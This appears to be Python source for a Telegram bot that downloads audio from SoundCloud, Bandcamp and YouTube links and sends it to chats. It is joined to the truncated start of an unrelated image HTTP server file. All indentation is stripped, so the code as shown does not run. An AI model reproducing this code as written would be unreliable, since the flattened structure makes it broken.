self.NO_URLS_TEXT = get_response_text('no_urls.txt')
self.OLG_MSG_TEXT = get_response_text('old_msg.txt')
self.REGION_RESTRICTION_TEXT = get_response_text('region_restriction.txt')
self.DIRECT_RESTRICTION_TEXT = get_response_text('direct_restriction.txt')
self.LIVE_RESTRICTION_TEXT = get_response_text('live_restriction.txt')
# self.chat_storage = {}
self.chat_storage = shelve.open(chat_storage_file, writeback=True)
for chat_id in no_flood_chat_ids:
self.init_chat(chat_id=chat_id, chat_type=Chat.PRIVATE if chat_id > 0 else Chat.SUPERGROUP, flood="no")
self.ALERT_CHAT_IDS = set(alert_chat_ids) if alert_chat_ids else set()
self.STORE_CHAT_ID = store_chat_id
self.DL_DIR = dl_dir
self.COOKIES_DOWNLOAD_FILE = "/tmp/scdlbot_cookies.txt"
self.proxies = proxies
self.source_ips = source_ips
# https://yandex.com/support/music-app-ios/search-and-listen/listening-abroad.html
self.cookies_file = cookies_file
# if sc_auth_token:
# config = configparser.ConfigParser()
# config['scdl'] = {}
# config['scdl']['path'] = self.DL_DIR
# config['scdl']['auth_token'] = sc_auth_token
# config_dir = os.path.join(os.path.expanduser('~'), '.config', 'scdl')
# config_path = os.path.join(config_dir, 'scdl.cfg')
# os.makedirs(config_dir, exist_ok=True)
# with open(config_path, 'w') as config_file:
# config.write(config_file)
self.updater = Updater(token=tg_bot_token, use_context=True)
dispatcher = self.updater.dispatcher
start_command_handler = CommandHandler('start', self.help_command_callback)
dispatcher.add_handler(start_command_handler)
help_command_handler = CommandHandler('help', self.help_command_callback)
dispatcher.add_handler(help_command_handler)
settings_command_handler = CommandHandler('settings', self.settings_command_callback)
dispatcher.add_handler(settings_command_handler)
dl_command_handler = CommandHandler('dl', self.common_command_callback,
filters=~Filters.update.edited_message & ~Filters.forwarded)
dispatcher.add_handler(dl_command_handler)
link_command_handler = CommandHandler('link', self.common_command_callback,
filters=~Filters.update.edited_message & ~Filters.forwarded)
dispatcher.add_handler(link_command_handler)
message_with_links_handler = MessageHandler(~Filters.update.edited_message &
((Filters.text & (Filters.entity(MessageEntity.URL) |
Filters.entity(MessageEntity.TEXT_LINK))) |
(Filters.caption & (Filters.caption_entity(MessageEntity.URL) |
Filters.caption_entity(
MessageEntity.TEXT_LINK)))),
self.common_command_callback)
dispatcher.add_handler(message_with_links_handler)
button_query_handler = CallbackQueryHandler(self.button_query_callback)
dispatcher.add_handler(button_query_handler)
inline_query_handler = InlineQueryHandler(self.inline_query_callback)
dispatcher.add_handler(inline_query_handler)
unknown_handler = MessageHandler(Filters.command, self.unknown_command_callback)
dispatcher.add_handler(unknown_handler)
dispatcher.add_error_handler(self.error_callback)
self.bot_username = self.updater.bot.get_me().username
self.RANT_TEXT_PRIVATE = "Read /help to learn how to use me"
self.RANT_TEXT_PUBLIC = "[Start me in PM to read help and learn how to use me](t.me/{}?start=1)".format(
self.bot_username)
def start(self, use_webhook=False, webhook_host="127.0.0.1", webhook_port=None, cert_file=None, cert_key_file=None,
url_path="scdlbot"):
if use_webhook:
self.updater.start_webhook(listen=webhook_host,
port=webhook_port,
url_path=url_path)
# cert=cert_file if cert_file else None,
# key=cert_key_file if cert_key_file else None,
# webhook_url=urljoin(app_url, url_path))
self.updater.bot.set_webhook(url=urljoin(self.APP_URL, url_path),
certificate=open(cert_file, 'rb') if cert_file else None)
else:
self.updater.start_polling()
logger.warning("Bot started")
self.updater.idle()
def unknown_command_callback(self, update: Update, context: CallbackContext):
pass
# bot.send_message(chat_id=update.message.chat_id, text="Unknown command")
def error_callback(self, update: Update, context: CallbackContext): # skipcq: PYL-R0201
try:
raise context.error
except Unauthorized:
# remove update.message.chat_id from conversation list
logger.debug('Update {} caused Unauthorized error: {}'.format(update, context.error))
except BadRequest:
# handle malformed requests - read more below!
logger.debug('Update {} caused BadRequest error: {}'.format(update, context.error))
except TimedOut:
# handle slow connection problems
logger.debug('Update {} caused TimedOut error: {}'.format(update, context.error))
except NetworkError:
# handle other connection problems
logger.debug('Update {} caused NetworkError: {}'.format(update, context.error))
except ChatMigrated as e:
# the chat_id of a group has changed, use e.new_chat_id instead
logger.debug('Update {} caused ChatMigrated error: {}'.format(update, context.error))
except TelegramError:
# handle all other telegram related errors
logger.debug('Update {} caused TelegramError: {}'.format(update, context.error))
def init_chat(self, message=None, chat_id=None, chat_type=None, flood="yes"):
if message:
chat_id = str(message.chat_id)
chat_type = message.chat.type
else:
chat_id = str(chat_id)
if chat_id not in self.chat_storage:
self.chat_storage[chat_id] = {}
if "settings" not in self.chat_storage[chat_id]:
self.chat_storage[chat_id]["settings"] = {}
if "mode" not in self.chat_storage[chat_id]["settings"]:
if chat_type == Chat.PRIVATE:
self.chat_storage[chat_id]["settings"]["mode"] = "dl"
else:
self.chat_storage[chat_id]["settings"]["mode"] = "ask"
if "flood" not in self.chat_storage[chat_id]["settings"]:
self.chat_storage[chat_id]["settings"]["flood"] = flood
if "rant_msg_ids" not in self.chat_storage[chat_id]["settings"]:
self.chat_storage[chat_id]["settings"]["rant_msg_ids"] = []
self.chat_storage.sync()
# logger.debug("Current chat_storage: %r", self.chat_storage)
def cleanup_chat(self, chat_id):
chat_msgs = self.chat_storage[str(chat_id)].copy()
for msg_id in chat_msgs:
if msg_id != "settings":
timedelta = datetime.now() - self.chat_storage[str(chat_id)][msg_id]["message"].date
if timedelta.days > 0:
self.chat_storage[str(chat_id)].pop(msg_id)
self.chat_storage.sync()
def rant_and_cleanup(self, bot, chat_id, rant_text, reply_to_message_id=None):
rant_msg = bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
text=rant_text, parse_mode='Markdown', disable_web_page_preview=True)
flood = self.chat_storage[str(chat_id)]["settings"]["flood"]
if flood == "no":
rant_msgs = self.chat_storage[str(chat_id)]["settings"]["rant_msg_ids"].copy()
for rant_msg_id in rant_msgs:
try:
bot.delete_message(chat_id=chat_id, message_id=rant_msg_id)
except:
pass
self.chat_storage[str(chat_id)]["settings"]["rant_msg_ids"].remove(rant_msg_id)
self.chat_storage[str(chat_id)]["settings"]["rant_msg_ids"].append(rant_msg.message_id)
self.chat_storage.sync()
def help_command_callback(self, update: Update, context: CallbackContext):
self.init_chat(update.message)
event_name = "help"
entities = update.message.parse_entities(types=[MessageEntity.BOT_COMMAND])
for entity_value in entities.values():
event_name = entity_value.replace("/", "").replace("@{}".format(self.bot_username), "")
break
log_and_track(event_name, update.message)
chat_id = update.message.chat_id
chat_type = update.message.chat.type
reply_to_message_id = update.message.message_id
flood = self.chat_storage[str(chat_id)]["settings"]["flood"]
if chat_type != Chat.PRIVATE and flood == "no":
self.rant_and_cleanup(context.bot, chat_id, self.RANT_TEXT_PUBLIC, reply_to_message_id=reply_to_message_id)
else:
context.bot.send_message(chat_id=chat_id, text=self.HELP_TEXT,
parse_mode='Markdown', disable_web_page_preview=True)
def get_wait_text(self):
return random.choice(self.WAIT_BIT_TEXT)
def get_settings_inline_keyboard(self, chat_id):
mode = self.chat_storage[str(chat_id)]["settings"]["mode"]
flood = self.chat_storage[str(chat_id)]["settings"]["flood"]
emoji_yes = "✅"
emoji_no = "❌"
button_dl = InlineKeyboardButton(text=" ".join([emoji_yes if mode == "dl" else emoji_no, "Download"]),
callback_data=" ".join(["settings", "dl"]))
button_link = InlineKeyboardButton(text=" ".join([emoji_yes if mode == "link" else emoji_no, "Links"]),
callback_data=" ".join(["settings", "link"]))
button_ask = InlineKeyboardButton(text=" ".join([emoji_yes if mode == "ask" else emoji_no, "Ask"]),
callback_data=" ".join(["settings", "ask"]))
button_flood = InlineKeyboardButton(text=" ".join([emoji_yes if flood == "yes" else emoji_no, "Captions"]),
callback_data=" ".join(["settings", "flood"]))
button_close = InlineKeyboardButton(text=" ".join([emoji_no, "Close settings"]),
callback_data=" ".join(["settings", "close"]))
inline_keyboard = InlineKeyboardMarkup([[button_dl, button_link, button_ask], [button_flood, button_close]])
return inline_keyboard
def settings_command_callback(self, update: Update, context: CallbackContext):
self.init_chat(update.message)
log_and_track("settings")
chat_id = update.message.chat_id
context.bot.send_message(chat_id=chat_id, parse_mode='Markdown',
reply_markup=self.get_settings_inline_keyboard(chat_id),
text=self.SETTINGS_TEXT)
def common_command_callback(self, update: Update, context: CallbackContext):
self.init_chat(update.message)
chat_id = update.message.chat_id
chat_type = update.message.chat.type
reply_to_message_id = update.message.message_id
command_entities = update.message.parse_entities(types=[MessageEntity.BOT_COMMAND])
if not command_entities:
command_passed = False
# if no command then it is just a message and use default mode
mode = self.chat_storage[str(chat_id)]["settings"]["mode"]
else:
command_passed = True
# try to determine mode from command
mode = None
for entity_value in command_entities.values():
mode = entity_value.replace("/", "").replace("@{}".format(self.bot_username), "")
break
if not mode:
mode = "dl"
if command_passed and not context.args:
rant_text = self.RANT_TEXT_PRIVATE if chat_type == Chat.PRIVATE else self.RANT_TEXT_PUBLIC
rant_text += "\nYou can simply send message with links (to download) OR command as `/{} <links>`.".format(
mode)
self.rant_and_cleanup(context.bot, chat_id, rant_text, reply_to_message_id=reply_to_message_id)
return
# apologize and send TYPING: always in PM and only when it's command in non-PM
apologize = chat_type == Chat.PRIVATE or command_passed
if apologize:
context.bot.send_chat_action(chat_id=chat_id, action=ChatAction.TYPING)
source_ip = None
proxy = None
if self.source_ips:
source_ip = random.choice(self.source_ips)
if self.proxies:
proxy = random.choice(self.proxies)
# TODO find working IP?
urls = self.prepare_urls(msg_or_text=update.message,
direct_urls=(mode == "link"),
source_ip=source_ip, proxy=proxy)
logger.debug(urls)
if not urls:
if apologize:
context.bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
text=self.NO_URLS_TEXT, parse_mode='Markdown')
else:
event_name = ("{}_cmd".format(mode)) if command_passed else ("{}_msg".format(mode))
log_and_track(event_name, update.message)
if mode == "dl":
wait_message = context.bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
parse_mode='Markdown', text=get_italic(self.get_wait_text()))
for url in urls:
self.download_url_and_send(context.bot, url, urls[url], chat_id=chat_id,
reply_to_message_id=reply_to_message_id,
wait_message_id=wait_message.message_id,
source_ip=source_ip, proxy=proxy)
elif mode == "link":
wait_message = context.bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
parse_mode='Markdown', text=get_italic(self.get_wait_text()))
link_text = get_link_text(urls)
context.bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
parse_mode='Markdown', disable_web_page_preview=True,
text=link_text if link_text else self.NO_URLS_TEXT)
context.bot.delete_message(chat_id=chat_id, message_id=wait_message.message_id)
elif mode == "ask":
# ask: always in PM and only if good urls exist in non-PM
if chat_type == Chat.PRIVATE or "http" in " ".join(urls.values()):
orig_msg_id = str(reply_to_message_id)
self.chat_storage[str(chat_id)][orig_msg_id] = {"message": update.message, "urls": urls,
"source_ip": source_ip, "proxy": proxy}
question = "🎶 links found, what to do?"
button_dl = InlineKeyboardButton(text="✅ Download", callback_data=" ".join([orig_msg_id, "dl"]))
button_link = InlineKeyboardButton(text="❇️ Links",
callback_data=" ".join([orig_msg_id, "link"]))
button_cancel = InlineKeyboardButton(text="❎", callback_data=" ".join([orig_msg_id, "nodl"]))
inline_keyboard = InlineKeyboardMarkup([[button_dl, button_link, button_cancel]])
context.bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
reply_markup=inline_keyboard, text=question)
self.cleanup_chat(chat_id)
def button_query_callback(self, update: Update, context: CallbackContext):
btn_msg = update.callback_query.message
self.init_chat(btn_msg)
user_id = update.callback_query.from_user.id
btn_msg_id = btn_msg.message_id
chat = btn_msg.chat
chat_id = chat.id
chat_type = chat.type
orig_msg_id, action = update.callback_query.data.split()
if orig_msg_id == "settings":
if chat_type != Chat.PRIVATE:
chat_member_status = chat.get_member(user_id).status
if chat_member_status not in [ChatMember.ADMINISTRATOR,
ChatMember.CREATOR] and user_id not in self.ALERT_CHAT_IDS:
log_and_track("settings_fail")
update.callback_query.answer(text="You're not chat admin")
return
log_and_track("settings_{}".format(action), btn_msg)
if action == "close":
context.bot.delete_message(chat_id, btn_msg_id)
else:
setting_changed = False
if action in ["dl", "link", "ask"]:
current_setting = self.chat_storage[str(chat_id)]["settings"]["mode"]
if action != current_setting:
setting_changed = True
self.chat_storage[str(chat_id)]["settings"]["mode"] = action
elif action in ["flood"]:
current_setting = self.chat_storage[str(chat_id)]["settings"]["flood"]
setting_changed = True
self.chat_storage[str(chat_id)]["settings"][action] = "no" if current_setting == "yes" else "yes"
if setting_changed:
self.chat_storage.sync()
update.callback_query.answer(text="Settings changed")
update.callback_query.edit_message_reply_markup(parse_mode='Markdown',
reply_markup=self.get_settings_inline_keyboard(
chat_id))
else:
update.callback_query.answer(text="Settings not changed")
elif orig_msg_id in self.chat_storage[str(chat_id)]:
msg_from_storage = self.chat_storage[str(chat_id)].pop(orig_msg_id)
orig_msg = msg_from_storage["message"]
urls = msg_from_storage["urls"]
source_ip = msg_from_storage["source_ip"]
proxy = msg_from_storage["proxy"]
log_and_track("{}_msg".format(action), orig_msg)
if action == "dl":
update.callback_query.answer(text=self.get_wait_text())
wait_message = update.callback_query.edit_message_text(parse_mode='Markdown',
text=get_italic(self.get_wait_text()))
for url in urls:
self.download_url_and_send(context.bot, url, urls[url], chat_id=chat_id,
reply_to_message_id=orig_msg_id,
wait_message_id=wait_message.message_id,
source_ip=source_ip, proxy=proxy)
elif action == "link":
update.callback_query.answer(text=self.get_wait_text())
wait_message = update.callback_query.edit_message_text(parse_mode='Markdown',
text=get_italic(self.get_wait_text()))
urls = self.prepare_urls(urls.keys(), direct_urls=True, source_ip=source_ip, proxy=proxy)
link_text = get_link_text(urls)
context.bot.send_message(chat_id=chat_id, reply_to_message_id=orig_msg_id,
parse_mode='Markdown', disable_web_page_preview=True,
text=link_text if link_text else self.NO_URLS_TEXT)
context.bot.delete_message(chat_id=chat_id, message_id=wait_message.message_id)
elif action == "nodl":
context.bot.delete_message(chat_id=chat_id, message_id=btn_msg_id)
else:
update.callback_query.answer(text=self.OLG_MSG_TEXT)
context.bot.delete_message(chat_id=chat_id, message_id=btn_msg_id)
def inline_query_callback(self, update: Update, context: CallbackContext):
log_and_track("link_inline")
inline_query_id = update.inline_query.id
text = update.inline_query.query
results = []
urls = self.prepare_urls(msg_or_text=text, direct_urls=True)
for url in urls:
for direct_url in urls[url].splitlines(): # TODO: fix non-mp3 and allow only sc/bc
logger.debug(direct_url)
results.append(
InlineQueryResultAudio(id=str(uuid4()), audio_url=direct_url, title="FAST_INLINE_DOWNLOAD"))
try:
context.bot.answer_inline_query(inline_query_id, results)
except:
pass
def prepare_urls(self, msg_or_text, direct_urls=False, source_ip=None, proxy=None):
if isinstance(msg_or_text, Message):
urls = []
url_entities = msg_or_text.parse_entities(types=[MessageEntity.URL])
url_caption_entities = msg_or_text.parse_caption_entities(types=[MessageEntity.URL])
url_entities.update(url_caption_entities)
for entity in url_entities:
url_str = url_entities[entity]
logger.debug("Entity URL Parsed: %s", url_str)
if "://" not in url_str:
url_str = "http://{}".format(url_str)
urls.append(URL(url_str))
text_link_entities = msg_or_text.parse_entities(types=[MessageEntity.TEXT_LINK])
text_link_caption_entities = msg_or_text.parse_caption_entities(types=[MessageEntity.TEXT_LINK])
text_link_entities.update(text_link_caption_entities)
for entity in text_link_entities:
url_str = entity.url
logger.debug("Entity Text Link Parsed: %s", url_str)
urls.append(URL(url_str))
else:
urls = find_all_links(msg_or_text, default_scheme="http")
urls_dict = {}
for url in urls:
url_text = url.to_text(True)
#FIXME crutch:
url_text = url_text.replace("m.soundcloud.com", "soundcloud.com")
url_parts_num = len([part for part in url.path_parts if part])
try:
if (
# SoundCloud: tracks, sets and widget pages, no /you/ pages
(self.SITES["sc"] in url.host and (2 <= url_parts_num <= 3 or self.SITES["scapi"] in url_text) and (
not "you" in url.path_parts)) or
# Bandcamp: tracks and albums
(self.SITES["bc"] in url.host and (2 <= url_parts_num <= 2)) or
# YouTube: videos and playlists
(self.SITES["yt"] in url.host and (
"youtu.be" in url.host or "watch" in url.path or "playlist" in url.path))
):
if direct_urls or self.SITES["yt"] in url.host:
urls_dict[url_text] = get_direct_urls(url_text, self.cookies_file, self.COOKIES_DOWNLOAD_FILE,
source_ip, proxy)
else:
urls_dict[url_text] = "http"
elif not any((site in url.host for site in self.SITES.values())):
urls_dict[url_text] = get_direct_urls(url_text, self.cookies_file, self.COOKIES_DOWNLOAD_FILE,
source_ip, proxy)
except ProcessExecutionError:
logger.debug("youtube-dl get-url failed: %s", url_text)
except URLError as exc:
urls_dict[url_text] = exc.status
return urls_dict
@REQUEST_TIME.time()
@run_async
def download_url_and_send(self, bot, url, direct_urls, chat_id, reply_to_message_id=None,
wait_message_id=None, source_ip=None, proxy=None):
bot.send_chat_action(chat_id=chat_id, action=ChatAction.RECORD_AUDIO)
download_dir = os.path.join(self.DL_DIR, str(uuid4()))
shutil.rmtree(download_dir, ignore_errors=True)
os.makedirs(download_dir)
status = 0
if direct_urls == "direct":
status = -3
elif direct_urls == "country":
status = -4
elif direct_urls == "live":
status = -5
else:
if (self.SITES["sc"] in url and self.SITES["scapi"] not in url) or (self.SITES["bc"] in url):
cmd_name = "scdl"
cmd_args = []
cmd = None
cmd_input = None
if self.SITES["sc"] in url and self.SITES["scapi"] not in url:
cmd_name = "scdl"
cmd_args = (
"-l", url, # URL of track/playlist/user
"-c", # Continue if a music already exist
"--path", download_dir, # Download the music to a custom path
"--onlymp3", # Download only the mp3 file even if the track is Downloadable
"--addtofile", # Add the artist name to the filename if it isn't in the filename already
"--addtimestamp",
# Adds the timestamp of the creation of the track to the title (useful to sort chronologically)
"--no-playlist-folder",
# Download playlist tracks into directory, instead of making a playlist subfolder
"--extract-artist", # Set artist tag from title instead of username
)
cmd = scdl_bin
cmd_input = None
elif self.SITES["bc"] in url:
cmd_name = "bandcamp-dl"
cmd_args = (
"--base-dir", download_dir, # Base location of which all files are downloaded
"--template", "%{track} - %{artist} - %{title} [%{album}]", # Output filename template
"--overwrite", # Overwrite tracks that already exist
"--group", # Use album/track Label as iTunes grouping
"--embed-art", # Embed album art (if available)
"--no-slugify", # Disable slugification of track, album, and artist names
url, # URL of album/track
)
cmd = bandcamp_dl_bin
cmd_input = "yes"
logger.info("%s starts: %s", cmd_name, url)
cmd_proc = cmd[cmd_args].popen(stdin=PIPE, stdout=PIPE, stderr=PIPE, universal_newlines=True)
try:
cmd_stdout, cmd_stderr = cmd_proc.communicate(input=cmd_input, timeout=self.DL_TIMEOUT)
cmd_retcode = cmd_proc.returncode
# TODO listed are common scdl problems for one track with 0 retcode, all its output is always in stderr:
if cmd_retcode or (any(err in cmd_stderr for err in ["Error resolving url", "is not streamable",
"Failed to get item"]) and ".mp3" not in cmd_stderr):
raise ProcessExecutionError(cmd_args, cmd_retcode, cmd_stdout, cmd_stderr)
logger.info("%s succeeded: %s", cmd_name, url)
status = 1
except TimeoutExpired:
cmd_proc.kill()
logger.info("%s took too much time and dropped: %s", cmd_name, url)
status = -1
except ProcessExecutionError:
logger.exception("%s failed: %s", cmd_name, url)
if status == 0:
cmd_name = "youtube-dl"
cmd = youtube_dl_func
# TODO: set different ydl_opts for different sites
ydl_opts = {
'format': 'bestaudio/best',
'outtmpl': os.path.join(download_dir, '%(title)s.%(ext)s'),
# default: %(autonumber)s - %(title)s-%(id)s.%(ext)s
'postprocessors': [
{
'key': 'FFmpegExtractAudio',
'preferredcodec': 'mp3',
'preferredquality': '128',
},
# {'key': 'EmbedThumbnail',}, {'key': 'FFmpegMetadata',},
],
}
if 'tiktok.com' in url:
ydl_opts['postprocessors'] = []
if proxy:
ydl_opts['proxy'] = proxy
if source_ip:
ydl_opts['source_address'] = source_ip
# https://github.com/ytdl-org/youtube-dl/blob/master/youtube_dl/YoutubeDL.py#L210
if self.cookies_file:
if "http" in self.cookies_file:
ydl_opts['cookiefile'] = self.COOKIES_DOWNLOAD_FILE
else:
ydl_opts['cookiefile'] = self.cookies_file
queue = Queue()
cmd_args = (url, ydl_opts, queue,)
logger.info("%s starts: %s", cmd_name, url)
cmd_proc = Process(target=cmd, args=cmd_args)
cmd_proc.start()
try:
cmd_retcode, cmd_stderr = queue.get(block=True, timeout=self.DL_TIMEOUT)
cmd_stdout = ""
cmd_proc.join()
if cmd_retcode:
raise ProcessExecutionError(cmd_args, cmd_retcode, cmd_stdout, cmd_stderr)
# raise cmd_status #TODO: pass and re-raise original Exception?
logger.info("%s succeeded: %s", cmd_name, url)
status = 1
except Empty:
cmd_proc.join(1)
if cmd_proc.is_alive():
cmd_proc.terminate()
logger.info("%s took too much time and dropped: %s", cmd_name, url)
status = -1
except ProcessExecutionError:
logger.exception("%s failed: %s", cmd_name, url)
status = -2
gc.collect()
if status == -1:
bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
text=self.DL_TIMEOUT_TEXT, parse_mode='Markdown')
elif status == -2:
bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
text=self.NO_AUDIO_TEXT, parse_mode='Markdown')
elif status == -3:
bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
text=self.DIRECT_RESTRICTION_TEXT, parse_mode='Markdown')
elif status == -4:
bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
text=self.REGION_RESTRICTION_TEXT, parse_mode='Markdown')
elif status == -5:
bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
text=self.LIVE_RESTRICTION_TEXT, parse_mode='Markdown')
elif status == 1:
file_list = []
for d, dirs, files in os.walk(download_dir):
for file in files:
file_list.append(os.path.join(d, file))
if not file_list:
logger.info("No files in dir: %s", download_dir)
bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
text="*Sorry*, I couldn't download any files from provided links",
parse_mode='Markdown')
else:
for file in sorted(file_list):
file_name = os.path.split(file)[-1]
file_parts = []
try:
file_parts = self.convert_and_split_audio_file(file)
except FileNotSupportedError as exc:
if not (exc.file_format in ["m3u", "jpg", "jpeg", "png", "finished", "tmp"]):
logger.warning("Unsupported file format: %s", file_name)
bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
text="*Sorry*, downloaded file `{}` is in format I could not yet convert or send".format(
file_name),
parse_mode='Markdown')
except FileTooLargeError as exc:
logger.info("Large file for convert: %s", file_name)
bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
text="*Sorry*, downloaded file `{}` is `{}` MB and it is larger than I could convert (`{} MB`)".format(
file_name, exc.file_size // 1000000,
self.MAX_CONVERT_FILE_SIZE // 1000000),
parse_mode='Markdown')
except FileSplittedPartiallyError as exc:
file_parts = exc.file_parts
logger.exception("Splitting failed: %s", file_name)
bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
text="*Sorry*, not enough memory to convert file `{}`..".format(
file_name),
parse_mode='Markdown')
except FileNotConvertedError as exc:
logger.exception("Splitting failed: %s", file_name)
bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
text="*Sorry*, not enough memory to convert file `{}`..".format(
file_name),
parse_mode='Markdown')
try:
caption = None
flood = self.chat_storage[str(chat_id)]["settings"]["flood"]
if flood == "yes":
addition = ""
url_obj = URL(url)
if self.SITES["yt"] in url_obj.host:
source = "YouTube"
file_root, file_ext = os.path.splitext(file_name)
file_title = file_root.replace(file_ext, "")
addition = ": " + file_title
elif self.SITES["sc"] in url_obj.host:
source = "SoundCloud"
elif self.SITES["bc"] in url_obj.host:
source = "Bandcamp"
else:
source = url_obj.host.replace(".com", "").replace("www.", "").replace("m.", "")
# if "youtu.be" in url_obj.host:
# url = url.replace("http://", "").replace("https://", "")
# else:
# url = shorten_url(url)
caption = "@{} _got it from_ [{}]({}){}".format(self.bot_username.replace("_", "\_"),
source, url, addition.replace("_", "\_"))
# logger.info(caption)
sent_audio_ids = self.send_audio_file_parts(bot, chat_id, file_parts,
reply_to_message_id if flood == "yes" else None,
caption)
except FileSentPartiallyError as exc:
sent_audio_ids = exc.sent_audio_ids
bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
text="*Sorry*, could not send file `{}` or some of it's parts..".format(
file_name),
parse_mode='Markdown')
logger.warning("Sending some parts failed: %s", file_name)
if not self.SERVE_AUDIO:
shutil.rmtree(download_dir, ignore_errors=True)
if wait_message_id: # TODO: delete only once
try:
bot.delete_message(chat_id=chat_id, message_id=wait_message_id)
except:
pass
def convert_and_split_audio_file(self, file=""):
file_root, file_ext = os.path.splitext(file)
file_format = file_ext.replace(".", "").lower()
file_size = os.path.getsize(file)
# FIXME unknown_video is for tiktok
if file_format not in ["mp3", "m4a", "mp4", "unknown_video"]:
raise FileNotSupportedError(file_format)
if file_size > self.MAX_CONVERT_FILE_SIZE:
raise FileTooLargeError(file_size)
# FIXME unknown_video is for tiktok
if file_format not in ["mp3", "unknown_video"]:
logger.info("Converting: %s", file)
try:
file_converted = file.replace(file_ext, ".mp3")
ffinput = ffmpeg.input(file)
ffmpeg.output(ffinput, file_converted, audio_bitrate="128k", vn=None).run()
file = file_converted
file_root, file_ext = os.path.splitext(file)
file_format = file_ext.replace(".", "").lower()
file_size = os.path.getsize(file)
except Exception:
# TODO exceptions
raise FileNotConvertedError
file_parts = []
if file_size <= self.MAX_TG_FILE_SIZE:
file_parts.append(file)
else:
logger.info("Splitting: %s", file)
id3 = None
try:
id3 = ID3(file, translate=False)
except:
pass
parts_number = file_size // self.MAX_TG_FILE_SIZE + 1
# https://github.com/c0decracker/video-splitter
# https://superuser.com/a/1354956/464797
try:
# file_duration = float(ffmpeg.probe(file)['format']['duration'])
part_size = file_size // parts_number
cur_position = 0
for i in range(parts_number):
file_part = file.replace(file_ext, ".part{}{}".format(str(i + 1), file_ext))
ffinput = ffmpeg.input(file)
if i == (parts_number - 1):
ffmpeg.output(ffinput, file_part, codec="copy", vn=None, ss=cur_position).run()
else:
ffmpeg.output(ffinput, file_part, codec="copy", vn=None, ss=cur_position, fs=part_size).run()
part_duration = float(ffmpeg.probe(file_part)['format']['duration'])
cur_position += part_duration
if id3:
try:
id3.save(file_part, v1=2, v2_version=4)
except:
pass
file_parts.append(file_part)
except Exception:
# TODO exceptions
raise FileSplittedPartiallyError(file_parts)
return file_parts
def send_audio_file_parts(self, bot, chat_id, file_parts, reply_to_message_id=None, caption=None):
sent_audio_ids = []
for index, file_part in enumerate(file_parts):
path = pathlib.Path(file_part)
file_name = os.path.split(file_part)[-1]
# file_name = translit(file_name, 'ru', reversed=True)
logger.info("Sending: %s", file_name)
bot.send_chat_action(chat_id=chat_id, action=ChatAction.UPLOAD_AUDIO)
caption_part = None
if len(file_parts) > 1:
caption_part = "Part {} of {}".format(str(index + 1), str(len(file_parts)))
if caption:
if caption_part:
caption_full = caption_part + " | " + caption
else:
caption_full = caption
else:
if caption_part:
caption_full = caption_part
else:
caption_full = ""
# caption_full = textwrap.shorten(caption_full, width=190, placeholder="..")
for i in range(3):
try:
if file_part.endswith('.mp3'):
mp3 = MP3(file_part)
duration = round(mp3.info.length)
performer = None
title = None
try:
performer = ", ".join(mp3['artist'])
title = ", ".join(mp3['title'])
except:
pass
if self.SERVE_AUDIO:
audio = str(urljoin(self.APP_URL, str(path.relative_to(self.DL_DIR))))
logger.debug(audio)
else:
audio = open(file_part, 'rb')
if i > 0:
# maybe: Reply message not found
reply_to_message_id = None
audio_msg = bot.send_audio(chat_id=chat_id,
reply_to_message_id=reply_to_message_id,
audio=audio,
duration=duration,
performer=performer,
title=title,
caption=caption_full,
parse_mode='Markdown')
sent_audio_ids.append(audio_msg.audio.file_id)
logger.info("Sending succeeded: %s", file_name)
break
# FIXME unknown_video is for tiktok
elif file_part.endswith('.unknown_video'):
video = open(file_part, 'rb')
video_msg = bot.send_video(chat_id=chat_id,
reply_to_message_id=reply_to_message_id,
video=video,
# duration=duration,
caption=caption_full,
parse_mode='Markdown')
sent_audio_ids.append(video_msg.video.file_id)
logger.info("Sending succeeded: %s", file_name)
break
except TelegramError:
if i == 2:
logger.exception("Sending failed because of TelegramError: %s", file_name)
if len(sent_audio_ids) != len(file_parts):
raise FileSentPartiallyError(sent_audio_ids)
return sent_audio_ids
|
server.py
|
import os
import io
import json
import time
import threading
import queue
from http import HTTPStatus
from urllib.parse import unquote
from PIL import Image
from network import HTTPBaseServer, HTTPResponseHeader
app_dir = os.path.split(os.path.realpath(__file__))[0]
index_path = os.path.join(app_dir, 'index.html')
def loadfile(path, mode='r', encoding='utf-8'):
with open(path, mode, encoding=encoding) as f:
return f.read()
class HTTPImageServer():
def __init__(self, bind_addr, imgroot='.', thumbnail='webp', allowcros=True, loglevel=2, favicon=None):
self.server = HTTPBaseServer(request_handler=self.handle, bind_addr=bind_addr)
self.imgroot = imgroot
self.img_extension = ['png', 'jpg', 'jpeg', 'tiff', 'webp', 'bmp']
self.print_lock = threading.Lock()
self.logqueue = queue.Queue()
self.thumbnail = thumbnail
self.allowcros = allowcros
self.loglevel = loglevel # 0: all information 1: only for response. 2: do not log image file. 3: no log.
self.icon = None
if favicon is not None:
with open(favicon, 'rb') as f:
self.icon = f.read()
def start(self, back=True):
t = threading.Thread(target=self.logger, name='Logger thread', daemon=True)
t.start()
self.server.start(back=back)
def logger(self):
while True:
try:
msg = self.logqueue.get(timeout=1)
print(msg)
except queue.Empty:
pass
@staticmethod
def parse_url(url):
location = url.split('?')[0]
params_str = url[len(location)+1:]
location = unquote(location)
params = {}
splits = params_str.split('&')
for split in splits:
split = unquote(split)
eq_pos = split.find('=')
if eq_pos == -1:
params[split] = None
continue
else:
key = split[:eq_pos]
value = split[eq_pos+1:]
params[key] = value
return location, params
def log(self, msg):
self.logqueue.put(msg)
def response(self, connection, header, content, loglevel=1):
if loglevel >= self.loglevel:
